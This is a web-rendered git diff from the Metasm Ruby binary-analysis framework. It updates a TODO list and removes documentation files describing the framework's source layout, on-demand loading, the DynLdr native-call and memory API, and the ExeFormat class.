Exe decoding generate decodeddata ?
|
||||||
Function-local namespace (esp+12 -> esp+var_42)
|
Function variable names using stack analysis + ExpressionString
|
||||||
Fix thunk detection (thunk: mov ecx, 42 jmp [iat_thiscall] is not a thunk)
|
Fix thunk detection (thunk: mov ecx, 42 jmp [iat_thiscall] is not a thunk)
|
||||||
Test with ET_REL style exe
|
Test with ET_REL style exe
|
||||||
Store stuff out of mem (to handle big binaries)
|
Store stuff out of mem (to handle big binaries)
|
||||||
Better :default usage
|
Better :default usage
|
||||||
good on call eax, but not on <600k instrs> ret
|
good on call eax, but not on <600k instrs> ret
|
||||||
use binary personality ? (uses call vs uses pushret..)
|
use binary personality ? (uses call vs uses pushret..)
|
||||||
Improve backtrace -> patch di.instr.args exprs
|
Improve 'backtrace => patch di.instr.args'
|
||||||
path-specific backtracking ( foo: call a ; a: jmp retloc ; bar: call b ; b: jmp retloc ; retloc: ret ; call foo ; ret : last ret trackback should only reach a:)
|
path-specific backtracking ( foo: call a ; a: jmp retloc ; bar: call b ; b: jmp retloc ; retloc: ret ; call foo ; ret : last ret trackback should only reach a:)
|
||||||
Decode pseudo/macro-instrs (mips 'li')
|
Decode pseudo/macro-instrs (mips 'li')
|
||||||
Deoptimizer (instr reordering for readability)
|
Deoptimizer (instr reordering for readability)
|
||||||
|
@ -69,6 +70,7 @@ Decompiler
|
||||||
Handle/hide compiler-generated stuff (getip, stack cookie setup/check..)
|
Handle/hide compiler-generated stuff (getip, stack cookie setup/check..)
|
||||||
Handle call 1f ; 1: pop eax
|
Handle call 1f ; 1: pop eax
|
||||||
More user control (force/forbid register arg, return type, etc)
|
More user control (force/forbid register arg, return type, etc)
|
||||||
|
Preserve C decompiled line association to range of asm decoded addrs
|
||||||
|
|
||||||
Debugger
|
Debugger
|
||||||
OSX
|
OSX
|
||||||
|
@ -81,7 +83,6 @@ Debugger
|
||||||
Remote debugging (small standalone C client)
|
Remote debugging (small standalone C client)
|
||||||
Support dbghelp.dll (ms symbol server info)
|
Support dbghelp.dll (ms symbol server info)
|
||||||
Support debugee function call (gdb 'call')
|
Support debugee function call (gdb 'call')
|
||||||
Manipulate memory through C struct casts
|
|
||||||
|
|
||||||
ExeFormat
|
ExeFormat
|
||||||
Handle minor editing without decode/reencode (eg patch ELF entrypoint)
|
Handle minor editing without decode/reencode (eg patch ELF entrypoint)
|
||||||
|
@ -105,10 +106,9 @@ GUI
|
||||||
show breakpoints
|
show breakpoints
|
||||||
show jump direction from current flag values
|
show jump direction from current flag values
|
||||||
have a console frontend
|
have a console frontend
|
||||||
better graph positionning fallback
|
|
||||||
zoom font when zooming graph
|
zoom font when zooming graph
|
||||||
copy/paste, selection
|
text selection
|
||||||
map (part of) the binary & debug it (map a PE on a linux host & run it)
|
map (part of) the binary & debug it (map a PE on a linux host & run it)
|
||||||
|
|
||||||
Ruby
|
Ruby
|
||||||
compile ruby AST to native optimized code
|
write a fast ruby-like interpreter
|
||||||
|
|
|
@ -1,146 +0,0 @@
|
||||||
Metasm source code organisation
|
|
||||||
===============================
|
|
||||||
|
|
||||||
The metasm source code takes advantage of the ruby language facilities,
|
|
||||||
which allows splitting the definition of a single class in multiple files.
|
|
||||||
|
|
||||||
Each file in the source tree holds code related to a particular feature of
|
|
||||||
the framework.
|
|
||||||
|
|
||||||
Directories
|
|
||||||
-----------
|
|
||||||
|
|
||||||
The top-level directories are :
|
|
||||||
|
|
||||||
* `doc/`: this documentation
|
|
||||||
* `metasm/`: the framework core
|
|
||||||
* `samples/`: a set of sample scripts showing various functionnalities of the framework
|
|
||||||
* `tests/`: a few unit tests (too few..)
|
|
||||||
* `misc/`: misc ruby scripts, not directly related to metasm
|
|
||||||
|
|
||||||
The core
|
|
||||||
--------
|
|
||||||
|
|
||||||
The `metasm/` directory holds most of the code of the framework, along with the
|
|
||||||
main `metasm.rb` file in the top directory.
|
|
||||||
|
|
||||||
The top-level `metasm.rb` has code to load parts of the framework source on demand
|
|
||||||
in the ruby interpreter, which is implemented with ruby's <const_missing.txt>
|
|
||||||
|
|
||||||
|
|
||||||
Executable formats
|
|
||||||
##################
|
|
||||||
|
|
||||||
The `exe_format/` subdirectory contains the implementations of the various
|
|
||||||
binary file formats supported in the framework.
|
|
||||||
|
|
||||||
Three files have a special meaning here:
|
|
||||||
|
|
||||||
* `main.rb`: it defines the <core/ExeFormat.txt> class
|
|
||||||
* `serialstruct.rb`: here you'll find the definitions of <core/SerialStruct.txt>
|
|
||||||
* `autoexe.rb`: the implementation of <core/AutoExe.txt>, which allows the recognition of arbitrary files from their binary signature.
|
|
||||||
|
|
||||||
The `main.rb` file is included in all other formats, as all file classes
|
|
||||||
are subclasses of `ExeFormat`.
|
|
||||||
|
|
||||||
The `serialstruct.rb` implements a helper class to ease the description of
|
|
||||||
binary structures, and generate parsing/encoding functions for those.
|
|
||||||
|
|
||||||
All other files implement a specific file format handler. The bigger files
|
|
||||||
(`ELF` and `PE/COFF`) are split between the parsing/encoding functions and
|
|
||||||
decoding/disassembly.
|
|
||||||
|
|
||||||
|
|
||||||
CPUs
|
|
||||||
####
|
|
||||||
|
|
||||||
All supported architectures have a dedicated subdirectory, and a helper file
|
|
||||||
that will simply include all the arch-specific files.
|
|
||||||
|
|
||||||
All those files will contribute to add functions to the same class implementing
|
|
||||||
the CPU interface. Not all CPUs implement all those features. They are:
|
|
||||||
|
|
||||||
* `main.rb`: inner classes definitions (for registers etc), generic functions
|
|
||||||
* `opcodes.rb`: initializes the opcode list for the architecture
|
|
||||||
* `encode.rb`: methods to encode instructions
|
|
||||||
* `decode.rb`: methods to decode/emulate instructions
|
|
||||||
* `parse.rb`: methods to parse asm instructions from a source file
|
|
||||||
* `render.rb`: methods to output an instruction to a string
|
|
||||||
* `compile_c.rb`: the C compiler implementation
|
|
||||||
* `decompile.rb`: the arch-specific part of the generic decompiler
|
|
||||||
* `debug.rb`: arch-specific information used when debugging target of this architecture
|
|
||||||
|
|
||||||
In some cases the files are small enough to be all merged into the `main.rb` file.
|
|
||||||
|
|
||||||
|
|
||||||
Operating systems
|
|
||||||
#################
|
|
||||||
|
|
||||||
The `os/` subdirectory holds the code used to abstract an operating systems.
|
|
||||||
|
|
||||||
The files here define an API allowing to enumerate running processes, and interact
|
|
||||||
with them in various ways. The <core/Debugger.txt> class and subclasses are
|
|
||||||
defined there.
|
|
||||||
|
|
||||||
Those files also holds the list of known functions and in which system libraries
|
|
||||||
they can be found (see <core/WindowsExports.txt> or <core/GNUExports.txt>), which
|
|
||||||
are used when linking executable files.
|
|
||||||
|
|
||||||
|
|
||||||
Graphical user-interface
|
|
||||||
########################
|
|
||||||
|
|
||||||
The `gui/` subdirectory contains the code needed by the metasm graphical user-interfaces.
|
|
||||||
|
|
||||||
Currently those include the disassembler and the debugger (see the *samples* section).
|
|
||||||
|
|
||||||
Those GUI elements are implemented using a custom GUI abstraction, and reside in the
|
|
||||||
various `dasm_*.rb` and `debug.rb`.
|
|
||||||
|
|
||||||
The actual implementation of the GUI are found in:
|
|
||||||
|
|
||||||
* `win32.rb`: the native Win32 API backend
|
|
||||||
* `gtk.rb`: a Gtk2 backend, intended for unix platforms
|
|
||||||
* `qt.rb`: a Qt backend experiment
|
|
||||||
|
|
||||||
Please note that the Qt backend does not work *at all*.
|
|
||||||
|
|
||||||
The `gui.rb` file in the main directory is used to chose among the available GUI backend
|
|
||||||
the most appropriate for the current session.
|
|
||||||
|
|
||||||
|
|
||||||
Others
|
|
||||||
######
|
|
||||||
|
|
||||||
The other files directly in the `metasm/` directory are either support files
|
|
||||||
(eg `encode.rb`, `parse.rb`) that hold generic functions to be used by
|
|
||||||
specific cpu/exeformat instances, or implement arch-agnostic features.
|
|
||||||
Those include:
|
|
||||||
|
|
||||||
* `preprocessor.rb`: the C/asm preprocessor/lexer
|
|
||||||
* `parse_c.rb`: this is the implementation of the C parser
|
|
||||||
* `compile_c.rb`: this is a C precompiler, it generates a very simplified C from a standard source
|
|
||||||
* `decompile.rb`: the generic decompiler code, it uses arch-specific functions defined in the arch folder
|
|
||||||
* `dynldr.rb`: this module is used when interacting directly with the host operating system through <core/DynLdr.txt>
|
|
||||||
|
|
||||||
|
|
||||||
The samples
|
|
||||||
-----------
|
|
||||||
|
|
||||||
The `samples/` directory contains a lot of small files that intend to be
|
|
||||||
exemples of how to use the framework. It also holds experiments and
|
|
||||||
work-in-progress for features that may later be integrated into the main
|
|
||||||
framework.
|
|
||||||
|
|
||||||
The comment at the beginning of the file should be clear about the purpose
|
|
||||||
of the script, and the scripts are expected to be copy/pasted and tweaked
|
|
||||||
for the specific task needed by the user (that's you).
|
|
||||||
|
|
||||||
Some of those files however are full-featured applications:
|
|
||||||
|
|
||||||
* `exeencode.rb`: a shellcode compiler, with its `peencode.rb`, `elfencode.rb`, `machoencode.rb` counterparts
|
|
||||||
* `disassemble.rb`: a disassembler
|
|
||||||
* `disassemble-gui.rb`: the graphical disassembler / debugger
|
|
||||||
|
|
||||||
The `samples/dasm-plugins/` subdirectory holds various plugins for the disassembler.
|
|
||||||
|
|
|
@ -1,16 +0,0 @@
|
||||||
The const_missing trick
|
|
||||||
=======================
|
|
||||||
|
|
||||||
Metasm uses a ruby trick to load most of the framework on demand, so that
|
|
||||||
*e.g.* the `MIPS`-related classes are never loaded in the ruby interpreter
|
|
||||||
unless you use them.
|
|
||||||
|
|
||||||
It is setup by the top-level `metasm.rb` file, by using the ruby mechanism of
|
|
||||||
`Module.autoload`. This mechanism will automatically load the specified metasm
|
|
||||||
components whenever a reference is made to one of the constants listed here.
|
|
||||||
|
|
||||||
Metasm provides a replacement top-level file, `misc/metasm-all.rb`,
|
|
||||||
which will unconditionally load all metasm files.
|
|
||||||
This will not however load mutually exclusive files, like the Gui subsystems ;
|
|
||||||
in this case it will load only the autodetected gui module (win32 or gtk).
|
|
||||||
|
|
|
@ -1,247 +0,0 @@
|
||||||
DynLdr
|
|
||||||
======
|
|
||||||
|
|
||||||
DynLdr is a class that uses metasm to dynamically add native methods,
|
|
||||||
or native method wrappers, available to the running ruby interpreter.
|
|
||||||
|
|
||||||
It leverages the built-in C parser / compiler.
|
|
||||||
|
|
||||||
It is implemented in `metasm/dynldr.rb`.
|
|
||||||
|
|
||||||
Currently only supported for <core/Ia32.txt> and <core/X86_64.txt> under
|
|
||||||
Windows and Linux.
|
|
||||||
|
|
||||||
|
|
||||||
Basics
|
|
||||||
------
|
|
||||||
|
|
||||||
Native library wrapper
|
|
||||||
######################
|
|
||||||
|
|
||||||
The main usage is to generate interfaces to native libraries.
|
|
||||||
|
|
||||||
This is done through the `#new_api_c` method.
|
|
||||||
|
|
||||||
The following exemple will read the specified C header fragment,
|
|
||||||
define ruby constants for all `#define`/`enum`, and define ruby
|
|
||||||
method wrappers to call the native functions whose prototype is
|
|
||||||
present in the header.
|
|
||||||
|
|
||||||
All referenced native functions must be exported by the given
|
|
||||||
library file.
|
|
||||||
|
|
||||||
class MyInterface < DynLdr
|
|
||||||
c_header = <<EOS
|
|
||||||
#define SomeConst 42
|
|
||||||
enum { V1, V2 };
|
|
||||||
|
|
||||||
__stdcall int methodist(char*, int);
|
|
||||||
EOS
|
|
||||||
|
|
||||||
new_api_c c_header, 'mylib.dll'
|
|
||||||
end
|
|
||||||
|
|
||||||
Then you can call, from the ruby:
|
|
||||||
|
|
||||||
MyInterface.methodist("lol", MyInterface::SOMECONST)
|
|
||||||
|
|
||||||
Constant/enum names are converted to full uppercase, and method
|
|
||||||
names are converted to full lowercase.
|
|
||||||
|
|
||||||
Dynamic native inline function
|
|
||||||
##############################
|
|
||||||
|
|
||||||
You can also dynamically compile native functions, that are compiled
|
|
||||||
in memory and copied to RWX memory with the right ruby wrapper:
|
|
||||||
|
|
||||||
class MyInterface < DynLdr
|
|
||||||
new_func_c <<EOS
|
|
||||||
int bla(char*arg) {
|
|
||||||
if (strlen(arg) > 4)
|
|
||||||
return 1;
|
|
||||||
else
|
|
||||||
return 0;
|
|
||||||
}
|
|
||||||
EOS
|
|
||||||
end
|
|
||||||
|
|
||||||
References to external functions are allowed, and resolved automatically.
|
|
||||||
|
|
||||||
The ruby objects used as arguments to the wrapper method are
|
|
||||||
automatically converted to the right C type.
|
|
||||||
|
|
||||||
|
|
||||||
You can also write native functions in assembly, but you must specify a
|
|
||||||
C prototype, used for argument and return value conversion.
|
|
||||||
|
|
||||||
class MyInterface < DynLdr
|
|
||||||
new_func_asm "int increment(int i);", <<EOS
|
|
||||||
mov eax, [esp+4]
|
|
||||||
inc eax
|
|
||||||
ret
|
|
||||||
EOS
|
|
||||||
|
|
||||||
p increment(4)
|
|
||||||
|
|
||||||
end
|
|
||||||
|
|
||||||
|
|
||||||
Structures
|
|
||||||
----------
|
|
||||||
|
|
||||||
`DynLdr` handles C structures.
|
|
||||||
|
|
||||||
Once a structure is specified in the C part, you can create a ruby object
|
|
||||||
using `MyClass.alloc_c_struct(structname)`, which will allocate an object of the
|
|
||||||
right size to hold all the structure members, and with the right accessors.
|
|
||||||
|
|
||||||
To access/modify struct members, you can either use a `Hash`-style access
|
|
||||||
|
|
||||||
structobj['membername'] = 42
|
|
||||||
|
|
||||||
or `Struct`-style access
|
|
||||||
|
|
||||||
structobj.membername = 42
|
|
||||||
|
|
||||||
Member names are matched case-insensitively, and nested structures/unions
|
|
||||||
are also searched.
|
|
||||||
|
|
||||||
The struct members can be initially populated by passing a `Hash` argument
|
|
||||||
to the `alloc_c_struct` constructor. Additionally, this hash may use the
|
|
||||||
special value `:size` to reference the byte size of the current structure.
|
|
||||||
|
|
||||||
class MyInterface < DynLdr
|
|
||||||
new_api_c <<EOS
|
|
||||||
struct sname {
|
|
||||||
int s_mysize;
|
|
||||||
int s_value;
|
|
||||||
union {
|
|
||||||
struct {
|
|
||||||
int s_bits:4;
|
|
||||||
int s_bits2:4;
|
|
||||||
};
|
|
||||||
int s_union;
|
|
||||||
}
|
|
||||||
};
|
|
||||||
EOS
|
|
||||||
end
|
|
||||||
|
|
||||||
# field s_mysize holds the size of the structure in bytes, ie 12
|
|
||||||
s_obj = MyInterface.alloc_c_struct('sname', :s_mysize => :size, :s_value => 42)
|
|
||||||
|
|
||||||
# we can access fields using Hash-style access
|
|
||||||
s_obj['s_UniOn'] = 0xa8
|
|
||||||
|
|
||||||
# or Struct-style access
|
|
||||||
puts '0x%x' % s_obj.s_BiTS2 # => '0xa'
|
|
||||||
|
|
||||||
This object can be directly passed as argument to a wrapped function, and
|
|
||||||
the native function will receive a pointer to this structure (that it can
|
|
||||||
freely modify).
|
|
||||||
|
|
||||||
This object is a `C::AllocStruct`, defined in `metasm/parse_c.rb`.
|
|
||||||
Internally, it is based on a ruby `String`, and has a reference to the parser's
|
|
||||||
`Struct` to find the mapping membername -> offsets/length.
|
|
||||||
|
|
||||||
See <core/CParser.txt> for more details.
|
|
||||||
|
|
||||||
|
|
||||||
Callbacks
|
|
||||||
---------
|
|
||||||
|
|
||||||
`DynLdr` handles C callbacks, with arbitrary ABI.
|
|
||||||
|
|
||||||
Any number of callbacks can be defined at any time.
|
|
||||||
|
|
||||||
C callbacks are backed by a ruby `Proc`, eg `lambda {}`.
|
|
||||||
|
|
||||||
|
|
||||||
class MyInterface < DynLdr
|
|
||||||
new_api_c <<EOS
|
|
||||||
void qsort(void *, int, int, int(*)(void*, void*));
|
|
||||||
EOS
|
|
||||||
|
|
||||||
str = "sanotheusnaonetuh"
|
|
||||||
cmp = lambda { |p1, p2|
|
|
||||||
memory_read(p1, 1) <=> memory_read(p2, 1)
|
|
||||||
}
|
|
||||||
qsort(str, str.length, 1, cmp)
|
|
||||||
p str
|
|
||||||
end
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
Argument conversion
|
|
||||||
-------------------
|
|
||||||
|
|
||||||
Ruby objects passed to a wrapper method are converted to the corresponding
|
|
||||||
C type
|
|
||||||
|
|
||||||
* `Strings` are converted to a C pointer to the byte buffer (also directly
|
|
||||||
accessible from the ruby through `DynLdr.str_ptr(obj)`
|
|
||||||
* `Integers` are converted to their C equivalent, according to the prototype
|
|
||||||
(`char`, `unsigned long long`, ...)
|
|
||||||
* `Procs` are converted to a C callback
|
|
||||||
* `Floats` are not supported for now.
|
|
||||||
|
|
||||||
|
|
||||||
Working with memory
|
|
||||||
-------------------
|
|
||||||
|
|
||||||
DynLdr provides different ways to allocate memory.
|
|
||||||
|
|
||||||
* `alloc_c_struct` to allocate a C structure
|
|
||||||
* `alloc_c_ary` to allocate C array of some type
|
|
||||||
* `alloc_c_ptr`, which is just an ary of size 1
|
|
||||||
* `memory_alloc` allocates memory from a new memory page
|
|
||||||
|
|
||||||
`memory_alloc` works by calling `mmap` under linux and `VirtualAlloc` under windows,
|
|
||||||
and is suitable for allocating memory where you want to control
|
|
||||||
the memory permissions (read, write, execute). This is done through `memory_perm`.
|
|
||||||
|
|
||||||
`memory_perm` takes for argument the start address, the length, and the new permission, specified as a String (e.g. 'r', 'rwx')
|
|
||||||
|
|
||||||
To work with memory that may be returned by an API (e.g. `malloc`),
|
|
||||||
DynLdr provides ways to read and write arbitrary pointers from the ruby
|
|
||||||
interpreter memory.
|
|
||||||
Take care, those may generate faults when called with invalid addresses that
|
|
||||||
will crash the ruby interpreter.
|
|
||||||
|
|
||||||
* `memory_read` takes a pointer and a length, and returns a String
|
|
||||||
* `memory_read_int` takes a pointer, and returns an Integer (of pointer size,
|
|
||||||
e.g. 64 bit in a 64-bit interpreter)
|
|
||||||
* `memory_write` takes a pointer and a String, and writes it to memory
|
|
||||||
* `memory_write_int`
|
|
||||||
|
|
||||||
|
|
||||||
Hacking
|
|
||||||
-------
|
|
||||||
|
|
||||||
Internally, DynLdr relies on a number of features that are not directly
|
|
||||||
available from the ruby interpreter.
|
|
||||||
|
|
||||||
So the first thing done by the script is to generate a binary native module
|
|
||||||
that will act as a C extension to the ruby interpreter.
|
|
||||||
This binary is necessarily different depending on the interpreter.
|
|
||||||
The binary name includes the target architecture, in the format
|
|
||||||
dynldr-*arch*-*cpu*-*19*.so, e.g.
|
|
||||||
|
|
||||||
* dynldr-linux-ia32.so
|
|
||||||
* dynldr-windows-x64-19.so
|
|
||||||
|
|
||||||
This native module is (re)generated if it does not exist, or is older than the
|
|
||||||
`dynldr.rb` script.
|
|
||||||
|
|
||||||
A special trick is used in this module, as it does not know the actual name
|
|
||||||
of the ruby library used by the interpreter. So on linux, the `libruby` is
|
|
||||||
removed from the `DT_NEEDED` library list, and on windows a special stub
|
|
||||||
is assembled to manually resolve the ruby imports needed by the module from
|
|
||||||
any instance of `libruby` present in the running process.
|
|
||||||
|
|
||||||
The native file is written to a directory writeably by the current user.
|
|
||||||
The following list of directories are tried, until a suitable one is found:
|
|
||||||
|
|
||||||
* the `metasm` directory itself
|
|
||||||
* the `$HOME`/`$APPDATA`/`$USERPROFILE` directory
|
|
||||||
* the `$TMP`/`$TEMP`/current directory
|
|
||||||
|
|
|
@ -1,43 +0,0 @@
|
||||||
ExeFormat
|
|
||||||
=========
|
|
||||||
|
|
||||||
This class is the parent of all executable format handlers.
|
|
||||||
|
|
||||||
It is defined in `metasm/exe_format/main.rb`.
|
|
||||||
|
|
||||||
It defines some standard shortcut functions, such as:
|
|
||||||
|
|
||||||
* `Exe.decode_file(filename)`
|
|
||||||
* `Exe.assemble(cpu,asm_source)`
|
|
||||||
* `Exe.compile_c(cpu,c_source)`
|
|
||||||
* `Exe#encode_file(filename)`
|
|
||||||
|
|
||||||
These methods will instanciate a new Exe, and call the corresponding
|
|
||||||
methods, *e.g.* `load` with the file content, and `decode`.
|
|
||||||
|
|
||||||
The handling of the different structures in the binary format should be
|
|
||||||
done using the <core/SerialStruct.txt> facility.
|
|
||||||
|
|
||||||
The subclasses are expected to implement various functions, depending on the
|
|
||||||
usage (refer to the ELF and COFF implementations for more details):
|
|
||||||
|
|
||||||
File decoding/disassembly
|
|
||||||
-------------------------
|
|
||||||
|
|
||||||
* `#decode_header`: parse the raw data in `#encoded` only to parse the file header
|
|
||||||
* `#decode`: parse all the raw data in `#encoded`
|
|
||||||
* `#cpu_from_headers`: return a <core/CPU.txt> instance according to the exe header information
|
|
||||||
* `#get_default_entrypoints`: the list of entrypoints (exported functions, etc)
|
|
||||||
* `#dump_section_header`: return a string that may be assembled to recreate the specified section
|
|
||||||
* `#section_info`: return a list of generic section informations for the disassembler
|
|
||||||
|
|
||||||
|
|
||||||
File encoding/source parsing
|
|
||||||
----------------------------
|
|
||||||
|
|
||||||
* `#tune_prepro`: define exe-specific macros for the preprocessor (optional)
|
|
||||||
* `#parse_init`: initialize the `@cursource` array to receive the parsed asm source
|
|
||||||
* `#parse_parser_instruction`: parse exe-specific instructions, eg `.text`, `.import`...
|
|
||||||
* `#assemble`: assemble the content of the @cursource into binary section contents
|
|
||||||
* `#encode`: assemble the various sections and a binary header into `@encoded`
|
|
||||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue